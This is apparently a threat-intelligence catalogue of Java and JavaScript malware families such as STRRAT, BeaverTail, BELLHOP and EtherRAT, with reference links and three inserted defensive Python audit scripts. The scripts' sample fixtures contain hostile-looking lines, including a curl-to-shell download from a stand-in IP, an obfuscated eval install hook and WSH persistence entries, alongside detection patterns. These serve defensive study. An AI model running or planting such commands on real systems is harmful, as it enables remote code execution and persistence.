| type | [] |
Sorillus RAT
Sorillus is a Java-based multifunctional remote access trojan (RAT) that targets Linux, macOS, and Windows operating systems. First created in 2019, the tool gained significant attention in 2022 when various obfuscated client versions began appearing on VirusTotal starting January 18, 2022. The RAT's features were detailed on its now-defunct website (hxxps://sorillus[.]com), where it was marketed for lifetime access at 59.99€, with a discounted price of 19.99€ at the time. Payments were conveniently accepted via various cryptocurrencies.
The creator and distributor of Sorillus, a YouTube user known as "Tapt," claimed the tool could collect sensitive information from infected systems, including:
- HardwareID
- Username
- Country
- Language
- Webcam footage
- Headless status
- Operating system details
- Client version
However, Sorillus was shut down in 2025 following the FBI's Operation "Talent," which targeted much of the cracking infrastructure, including Sellix, the payment portal used by Sorillus for transactions. This operation disrupted the financial infrastructure supporting the RAT, leading to its cessation of operations 5 days later.
Internal MISP references
UUID 80694785-aeb6-4e05-a3e8-cb972993d769 which can be used as unique global reference for Sorillus RAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus - webarchive
- https://www.orangecyberdefense.com/global/blog/cert-news/from-sambaspy-to-sorillus-dancing-through-a-multi-language-phishing-campaign-in-europe - webarchive
- https://abnormalsecurity.com/blog/tax-customers-sorillus-rat - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
STRRAT
STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird.
From version 1.2 onwards, STRRAT was infamous for its ransomware-like behavior of appending the file name extension .crimson to files. Version 1.5 is notably more obfuscated and modular than previous versions, but the backdoor functions mostly remain the same: collect browser passwords, run remote commands and PowerShell, log keystrokes, among others. Version 1.5 of STRRAT includes a proper encryption routine, though it is currently fairly simple to reverse.
Internal MISP references
UUID 6d1335d5-8351-4725-ad8a-07cabca4119e which can be used as unique global reference for STRRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat - webarchive
- https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign - webarchive
- https://www.gdatasoftware.com/blog/strrat-crimson - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://www.jaiminton.com/reverse-engineering/strrat - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/vcurms-a-simple-and-functional-weapon - webarchive
- https://isc.sans.edu/diary/rss/27798 - webarchive
- https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1 - webarchive
- https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/ - webarchive
- https://forensicitguy.github.io/strrat-attached-to-msi/ - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain - webarchive
- https://securityscorecard.com/wp-content/uploads/2024/01/How-to-Analyze-Java-Malware-%E2%80%93-A-Case-Study-of-STRRAT.pdf - webarchive
- https://twitter.com/MsftSecIntel/status/1395138347601854465 - webarchive
- https://www.jaiminton.com/reverse-engineering/strrat# - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SupremeBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SupremeBot.
| Known Synonyms |
|---|
| BlazeBot |
Internal MISP references
UUID 651e37e0-1bf8-4024-ac1e-e7bda42470b0 which can be used as unique global reference for SupremeBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Verblecon
This malware seems to be used for attacks installing cryptocurrency miners on infected machines. Other indicators lead to the assumption that attackers may also use this malware for other purposes (e.g. stealing access tokens for the Discord chat app). Symantec describes this malware as complex and powerful: the malware is loaded as a server-side polymorphic JAR file.
Internal MISP references
UUID 793565b4-666b-47a4-b15b-de9c80c75a51 which can be used as unique global reference for Verblecon in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
VersaMem
According to Lumen, a web shell used by Volt Typhoon.
Internal MISP references
UUID eb15c0ec-108e-4082-a0c1-ea41345b7db7 which can be used as unique global reference for VersaMem in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AIRBREAK
AIRBREAK is a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AIRBREAK.
| Known Synonyms |
|---|
| Orz |
Internal MISP references
UUID fd419da6-5c0d-461e-96ee-64397efac63b which can be used as unique global reference for AIRBREAK in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak - webarchive
- https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bateleur
Internal MISP references
UUID fb75a753-24ba-4b58-b7ed-2e39b0c68c65 which can be used as unique global reference for Bateleur in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BeaverTail (Javascript)
BeaverTail is a JavaScript malware primarily distributed through NPM packages. It is designed for information theft and to load further stages of malware, specifically a multi-stage Python-based backdoor known as InvisibleFerret. BeaverTail targets cryptocurrency wallets and credit card information stored in the victim's web browsers. Its code is heavily obfuscated to evade detection. Threat actors can either upload malicious NPM packages containing BeaverTail to GitHub or inject BeaverTail code into legitimate NPM projects. Researchers have identified additional Windows and macOS variants, indicating that the BeaverTail malware family is likely still under development.
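The two delivery paths described above, an install-time hook in a malicious package and code injected into an otherwise legitimate one, are what a dependency audit should look for. The following is an added example, not code from this page or from any of the cited vendors: a Python script that walks a node_modules tree, reports preinstall/install/postinstall/prepare hooks whose commands match risky patterns, and flags JavaScript files carrying common obfuscation markers. The indicator patterns, the line-length threshold and the two sample packages are constructed for illustration and are not BeaverTail signatures.

```python
"""Audit a node_modules tree for the two BeaverTail delivery paths: install-time
lifecycle hooks in package.json and heavily obfuscated JavaScript.
Added example with constructed sample packages; the patterns are generic, not signatures."""
import json
import os
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically on `npm install`, before any code is imported.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicators for install hooks (illustrative, not BeaverTail-specific).
HOOK_PATTERNS = [
    (r"\bnode\s+-e\b", "inline node execution"),
    (r"\b(curl|wget)\b", "network fetch during install"),
    (r"\bpowershell\b", "PowerShell from install hook"),
    (r"base64", "base64 handling in install hook"),
]

# Assumed obfuscation / dangerous-API markers for .js files.
JS_PATTERNS = [
    (r"\beval\s*\(", "eval()"),
    (r"\bnew\s+Function\s*\(", "Function constructor"),
    (r"require\(['\"]child_process['\"]\)", "child_process import"),
    (r"(?:\\x[0-9a-fA-F]{2}){16,}", "long hex-escaped string"),
]
MAX_LINE = 2000  # minified code is long too, so this is a triage hint, not a verdict


def audit_package_json(path):
    """Return (path, reason) for every lifecycle hook whose command matches a hook pattern."""
    data = json.loads(Path(path).read_text(encoding="utf-8"))
    scripts = data.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for pattern, why in HOOK_PATTERNS:
            if re.search(pattern, cmd):
                findings.append((str(path), f"{hook}: {why}"))
    return findings


def audit_js(path):
    """Return (path, reason) for JavaScript files with obfuscation or dangerous-API markers."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    findings = [(str(path), why) for pattern, why in JS_PATTERNS if re.search(pattern, text)]
    if any(len(line) > MAX_LINE for line in text.splitlines()):
        findings.append((str(path), f"line longer than {MAX_LINE} chars"))
    return findings


def audit_tree(root):
    """Walk a directory (typically node_modules) and collect all findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            if name == "package.json":
                findings += audit_package_json(full)
            elif name.endswith(".js"):
                findings += audit_js(full)
    return findings


def build_sample_tree():
    """Constructed node_modules: one benign package and one whose postinstall hook
    runs an obfuscated script. Package names and contents are made up."""
    root = Path(tempfile.mkdtemp())
    benign = root / "node_modules" / "left-pad-ish"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps(
        {"name": "left-pad-ish", "scripts": {"test": "node test.js"}}))
    (benign / "index.js").write_text("module.exports = s => s.padStart(8);\n")

    bad = root / "node_modules" / "totally-legit-utils"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps(
        {"name": "totally-legit-utils",
         "scripts": {"postinstall": "node -e \"require('./lib.js')\""}}))
    (bad / "lib.js").write_text(
        "var _0xa = '" + "\\x41" * 20 + "';\nrequire('child_process');\neval(_0xa);\n")
    return root


if __name__ == "__main__":
    for path, reason in audit_tree(build_sample_tree()):
        print(f"{reason:40} {path}")
```

Run it against a real checkout with `audit_tree("node_modules")`; every hit is something to read by hand, since legitimate native modules also use install hooks and minified bundles also trip the line-length check.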
Internal MISP references
UUID da0fb7ce-d730-4ee8-bcc8-3da7eba8ad79 which can be used as unique global reference for BeaverTail (Javascript) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.beavertail - webarchive
- https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-apt-activity-report-q4-2024-q1-2025.pdf - webarchive
- https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/ - webarchive
- https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/ - webarchive
- https://opensourcemalware.com/blog/contagious-interview-vscode - webarchive
- https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam - webarchive
- https://www.trendmicro.com/en_us/research/25/d/russian-infrastructure-north-korean-cybercrime.html - webarchive
- https://mp.weixin.qq.com/s/84lUaNSGo4lhQlpnCVUHfQ - webarchive
- https://www.nimanthadeshappriya.com/post/from-colombo-to-pyongyang - webarchive
- https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages - webarchive
- https://github.com/ssrdio/PublicIoC/tree/main/CestLaVie - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2025/papers/DeceptiveDevelopment-and-North-Korean-IT-workers-from-primitive-crypto-theft-to-sophisticated-AI-based-deception.pdf - webarchive
- https://www-cdn.anthropic.com/b2a76c6f6992465c09a6f2fce282f6c0cea8c200.pdf - webarchive
- https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-from-primitive-crypto-theft-to-sophisticated-ai-based-deception/ - webarchive
- https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages - webarchive
- https://www.aikido.dev/blog/malware-hiding-in-plain-sight-spying-on-north-korean-hackers - webarchive
- https://any.run/cybersecurity-blog/ottercookie-malware-analysis/ - webarchive
- https://blog.nviso.eu/2025/11/13/contagious-interview-actors-now-utilize-json-storage-services-for-malware-delivery/ - webarchive
- https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package - webarchive
- https://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263 - webarchive
- https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/ - webarchive
- https://objective-see.org/blog/blog_0x7A.html - webarchive
- https://securityscorecard.com/blog/the-job-offer-that-wasnt-how-we-stopped-an-espionage-plot - webarchive
- https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west - webarchive
- https://security.macnica.co.jp/blog/2024/10/-contagious-interview.html - webarchive
- https://www.cert.si/tz016/ - webarchive
- https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/ - webarchive
- https://doi.org/10.48550/arXiv.2505.21725 - webarchive
- https://asec.ahnlab.com/en/87299/ - webarchive
- https://socket.dev/blog/lazarus-expands-malicious-npm-campaign-11-new-packages-add-malware-loaders-and-bitbucket - webarchive
- https://jp.security.ntt/tech_blog/contagious-interview-ottercookie - webarchive
- https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/ - webarchive
- https://www.group-ib.com/blog/apt-lazarus-python-scripts/ - webarchive
- https://quetzal.bitso.com/p/interview-with-the-chollima - webarchive
- https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/ - webarchive
- https://stacklok.com/blog/dependency-hijacking-dissecting-north-koreas-new-wave-of-defi-themed-open-source-attacks-targeting-developers - webarchive
- https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages - webarchive
- https://securityscorecard.com/blog/operation-phantom-circuit-north-koreas-global-data-exfiltration-campaign/ - webarchive
- https://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2 - webarchive
- https://blog.talosintelligence.com/beavertail-and-ottercookie/ - webarchive
- https://www.securonix.com/blog/research-update-threat-actors-behind-the-devpopper-campaign-have-retooled-and-are-continuing-to-target-software-developers-via-social-engineering/ - webarchive
- https://www.gov.il/BlobFolder/reports/beavertail/he/Analyzing%20the%20BeaverTail%20Infostealer.pdf - webarchive
- https://jp.security.ntt/tech_blog/en-waterplum-ottercookie - webarchive
- https://web.archive.org/web/20250206220041/https://stacklok.com/blog/dependency-hijacking-dissecting-north-koreas-new-wave-of-defi-themed-open-source-attacks-targeting-developers - webarchive
- https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat - webarchive
- https://www.silentpush.com/blog/contagious-interview-front-companies/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BELLHOP
BELLHOP is a JavaScript backdoor interpreted using the native Windows Script Host (WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways:
- creating a Run key in the Registry
- creating a RunOnce key in the Registry
- creating a persistent named scheduled task
BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and Pastebin.
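A defender can check the three persistence locations listed above for entries that hand a script to WSH. The following added example (not FireEye's code and not from this page) parses text exported with `reg query` for the Run and RunOnce keys and with `schtasks /query /fo list /v`, and flags commands that launch wscript.exe or cscript.exe, name a script extension, or use a `//E:` engine override, which makes WSH run a file of any extension as JScript. A user-writable path is recorded as context only, because plenty of legitimate autostarts live under AppData. The sample exports, value names and task names below are constructed.

```python
"""Triage the three persistence locations described for BELLHOP (Run key, RunOnce key,
scheduled task) for entries that hand a script to the Windows Script Host.
Added example; parses text from `reg query` and `schtasks /query /fo list /v`.
The sample exports below are constructed."""
import re

# `reg query` prints values as: 4 spaces, name, 4 spaces, REG_type, 4 spaces, data.
REG_VALUE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
WSH_HOST = re.compile(r"\b[wc]script(?:\.exe)?\b", re.I)
SCRIPT_EXT = re.compile(r"\.(?:js|jse|wsf|wsh|vbs|vbe)\b", re.I)
ENGINE_OVERRIDE = re.compile(r"//e:\s*\w*script", re.I)  # //E:jscript runs any file as JScript
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.I)
PATH_NOTE = "user-writable path"


def classify(command):
    """Return the reasons a command line looks like WSH-hosted script persistence."""
    reasons = []
    if WSH_HOST.search(command):
        reasons.append("launches Windows Script Host")
    if SCRIPT_EXT.search(command):
        reasons.append("script file extension")
    if ENGINE_OVERRIDE.search(command):
        reasons.append("//E: engine override")
    if USER_WRITABLE.search(command):
        reasons.append(PATH_NOTE)  # context only; many legitimate entries live here too
    return reasons


def parse_reg_query(text):
    """Yield (key, value_name, data) from `reg query` output for the Run and RunOnce keys."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = REG_VALUE.match(line)
        if m and key:
            yield key, m["name"], m["data"]


def parse_schtasks_list(text):
    """Yield (task_name, command) from `schtasks /query /fo list /v` output."""
    name = None
    for line in text.splitlines():
        if line.startswith("TaskName:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("Task To Run:") and name:
            yield name, line.split(":", 1)[1].strip()


def triage(reg_text, tasks_text):
    """Return (location, command, reasons) for entries with at least one script indicator."""
    candidates = [(f"{key}\\{name}", data) for key, name, data in parse_reg_query(reg_text)]
    candidates += [(f"task:{task}", cmd) for task, cmd in parse_schtasks_list(tasks_text)]
    findings = []
    for location, cmd in candidates:
        reasons = classify(cmd)
        if any(r != PATH_NOTE for r in reasons):  # a writable path alone is not enough
            findings.append((location, cmd, reasons))
    return findings


# Constructed `reg query` output: one normal entry and two that hand a file to WSH.
SAMPLE_REG = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    wscript.exe //B //E:jscript "C:\Users\alice\AppData\Roaming\upd.txt"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
    Cleanup    REG_SZ    cmd.exe /c cscript.exe "C:\ProgramData\svc\run.js"
"""

# Constructed `schtasks /query /fo list /v` output (only the fields this parser reads).
SAMPLE_TASKS = r"""
HostName:                             WS01
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Task To Run:                          %windir%\system32\defrag.exe -c -h -k -g -$
Status:                               Ready

HostName:                             WS01
TaskName:                             \SystemUpdateCheck
Task To Run:                          wscript.exe "C:\Users\alice\AppData\Roaming\Microsoft\gup.jse"
Status:                               Ready
"""

if __name__ == "__main__":
    for location, cmd, reasons in triage(SAMPLE_REG, SAMPLE_TASKS):
        print(location, "->", cmd, "|", ", ".join(reasons))
```

On a live host, feed it the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, the same for RunOnce and the HKLM equivalents, and `schtasks /query /fo list /v`; the `//E:` check matters because the script BELLHOP writes to disk need not carry a .js extension.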
Internal MISP references
UUID 7ebeb691-b979-4a88-94e1-dade780c6a7f which can be used as unique global reference for BELLHOP in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CACTUSTORCH
According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.
Internal MISP references
UUID efbb5a7c-8c01-4aca-ac21-8dd614b256f7 which can be used as unique global reference for CACTUSTORCH in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch - webarchive
- https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf - webarchive
- https://www.macnica.net/file/mpression_automobile.pdf - webarchive
- https://www.codercto.com/a/46729.html - webarchive
- https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ - webarchive
- https://github.com/mdsecactivebreach/CACTUSTORCH - webarchive
- https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ChromeBack
GoSecure describes ChromeBack as a browser hijacker, redirecting traffic and serving advertisements to users.
Internal MISP references
UUID ec055670-4d25-4918-90c7-281fddf3a771 which can be used as unique global reference for ChromeBack in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ClearFake
ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. The malware leverages social engineering to trick the user into running a fake web browser update.
Internal MISP references
UUID 8899bc6f-62e1-4732-988a-d5d64a5cf9bd which can be used as unique global reference for ClearFake in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.clearfake - webarchive
- https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/clearfake-update-tricks-victim-executing-malicious-powershell-code - webarchive
- https://rmceoin.github.io/malware-analysis/clearfake/ - webarchive
- https://blog.morphisec.com/coinlurker-the-stealer-powering-the-next-generation-of-fake-updates - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ContagiousDrop
According to SentinelOne, these applications, typically implemented in app.js files, are deployed on ClickFix malware distribution servers. These applications run servers that listen on configured ports to handle incoming HTTP GET and POST requests, executing different functions based on the specific request path. The ContagiousDrop applications deliver malware disguised as software updates or essential utilities. They distribute a tailored payload based on the victim’s operating system (Windows, macOS, or Linux), system architecture, and method of interaction with the server, such as the use of the curl command. In addition to delivering malware, the ContagiousDrop applications feature an integrated email notification system. These notifications, sent from a configured email address, provide the Contagious Interview threat actors with insights into victim engagement and interaction patterns and are delivered to their configured recipient addresses.
Internal MISP references
UUID 22800020-7ec6-4f22-a597-84f122d35dae which can be used as unique global reference for ContagiousDrop in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CryptoNight
WebAssembly-based crypto miner.
Internal MISP references
UUID faa19699-a884-4cd3-a307-36492c8ee77a which can be used as unique global reference for CryptoNight in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CukieGrab
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CukieGrab.
| Known Synonyms |
|---|
| Roblox Trade Assist |
Internal MISP references
UUID d47ca107-3e03-4c25-88f9-8156426b7f60 which can be used as unique global reference for CukieGrab in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DarkWatchman
Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA for C&C.
Internal MISP references
UUID 4baf5a22-7eec-4ad8-8780-23a351d9b5f5 which can be used as unique global reference for DarkWatchman in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman - webarchive
- https://www.intrinsec.com/wp-content/uploads/2025/11/INTRINSEC-2025-Threat-Report-Trouble_in_the_air.pdf - webarchive
- https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/ - webarchive
- https://securityintelligence.com/x-force/new-hive0117-phishing-campaign-imitates-conscription-summons-deliver-darkwatchman-malware/ - webarchive
- https://www.prevailion.com/darkwatchman-new-fileness-techniques/ - webarchive
- https://cyble.com/blog/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DNSRat
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSRat.
| Known Synonyms |
|---|
| DNSbot |
Internal MISP references
UUID a4b40d48-e40b-47f2-8e30-72342231503e which can be used as unique global reference for DNSRat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
doenerium
Open-source JavaScript info stealer that can steal crypto wallets, passwords and cookies and modify Discord clients: https://github.com/doener2323/doenerium
Internal MISP references
UUID dc446dbc-6f8a-48ee-9e90-10e679a003e1 which can be used as unique global reference for doenerium in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Enrume
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Enrume.
| Known Synonyms |
|---|
| Ransom32 |
Internal MISP references
UUID d6e5f6b7-cafb-476d-958c-72debdabe013 which can be used as unique global reference for Enrume in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EtherRAT
According to Sysdig, EtherRAT uses Ethereum smart contracts for C2 URL resolution. It establishes persistence through five independent mechanisms (systemd, xdg, cron, bashrc, profile), ensuring survival across reboots and system maintenance.
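An audit of the five user-level autostart locations named above, as an added example that is neither Sysdig's code nor part of this page. It reads systemd user units, XDG autostart entries, a crontab listing passed in as text (because `crontab -l` needs the live system), `~/.bashrc` and `~/.profile` under a given home directory and flags commands carrying generic implant markers. The markers, the assumption that the implant is launched with `node`, and the sample home directory are constructed for illustration, not EtherRAT indicators.

```python
"""Enumerate the five user-level autostart locations Sysdig lists for EtherRAT
(systemd user units, xdg autostart, cron, ~/.bashrc, ~/.profile) and flag entries
that look like a dropped implant. Added example run against a constructed $HOME;
the patterns are generic assumptions, not EtherRAT indicators."""
import re
import tempfile
from pathlib import Path

SUSPICIOUS = [
    (r"base64\s+(?:-d|--decode)\b", "inline base64 decode"),
    (r"\b(?:curl|wget)\b", "download at login"),
    (r"/(?:tmp|var/tmp|dev/shm)/", "runs from world-writable directory"),
    (r"\bnohup\b|&\s*$", "backgrounded at login"),
    (r"\bnode\s+\S+\.js\b", "Node.js script at login"),  # assumption: implant is JavaScript
]


def collect_entries(home, crontab_text):
    """Return (source, command) for every autostart command in the five locations."""
    entries = []
    units = home / ".config" / "systemd" / "user"
    if units.is_dir():
        for unit in sorted(units.glob("*.service")):
            for line in unit.read_text().splitlines():
                if line.startswith("ExecStart="):
                    entries.append((f"systemd:{unit.name}", line[len("ExecStart="):]))
    autostart = home / ".config" / "autostart"
    if autostart.is_dir():
        for desk in sorted(autostart.glob("*.desktop")):
            for line in desk.read_text().splitlines():
                if line.startswith("Exec="):
                    entries.append((f"xdg:{desk.name}", line[len("Exec="):]))
    for line in crontab_text.splitlines():
        if line.strip() and not line.lstrip().startswith("#"):
            entries.append(("cron", line.strip()))
    for rc in (".bashrc", ".profile"):
        path = home / rc
        if path.is_file():
            for line in path.read_text().splitlines():
                if line.strip() and not line.lstrip().startswith("#"):
                    entries.append((rc, line.strip()))
    return entries


def scan_home(home, crontab_text):
    """Return (source, command, reasons) for entries matching any SUSPICIOUS pattern."""
    findings = []
    for source, cmd in collect_entries(Path(home), crontab_text):
        reasons = [why for pattern, why in SUSPICIOUS if re.search(pattern, cmd)]
        if reasons:
            findings.append((source, cmd, reasons))
    return findings


def build_sample_home():
    """Constructed home directory: benign entries next to one planted entry per location."""
    home = Path(tempfile.mkdtemp())
    (home / ".config" / "systemd" / "user").mkdir(parents=True)
    (home / ".config" / "autostart").mkdir(parents=True)
    (home / ".config/systemd/user/dbus-broker.service").write_text(
        "[Service]\nExecStart=/usr/bin/dbus-broker-launch\n")
    (home / ".config/systemd/user/sysupd.service").write_text(
        "[Service]\nExecStart=/bin/sh -c 'nohup node /home/alice/.cache/.s/a.js'\n")
    (home / ".config/autostart/nm-applet.desktop").write_text("[Desktop Entry]\nExec=nm-applet\n")
    (home / ".config/autostart/update.desktop").write_text(
        '[Desktop Entry]\nExec=sh -c "curl -s http://198.51.100.7/x | sh"\n')
    (home / ".bashrc").write_text("alias ll='ls -l'\necho aGVsbG8= | base64 -d | sh\n")
    (home / ".profile").write_text("export PATH=$HOME/bin:$PATH\n")
    crontab = "# m h dom mon dow command\n@reboot /tmp/.x/run.sh\n"
    return home, crontab


if __name__ == "__main__":
    sample_home, sample_cron = build_sample_home()
    for source, cmd, reasons in scan_home(sample_home, sample_cron):
        print(f"{source:24} {cmd}  [{', '.join(reasons)}]")
```

Against a real account, call `scan_home(Path.home(), subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout)`; an implant with five redundant hooks is also the easiest one to spot, since every location should produce the same unfamiliar command.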
Internal MISP references
UUID eb429cbc-bb38-4256-9dbf-7c0380485336 which can be used as unique global reference for EtherRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.ether_rat - webarchive
- https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2 - webarchive
- https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EVILNUM (Javascript)
According to Proofpoint, EvilNum is a backdoor that can be used for data theft or to load additional payloads. The malware includes multiple interesting components to evade detection and modify infection paths based on identified antivirus software.
Internal MISP references
UUID b7deec7e-24f7-4f78-9d58-9b3c1e182ab3 which can be used as unique global reference for EVILNUM (Javascript) in MISP communities and other software using the MISP galaxy
External references
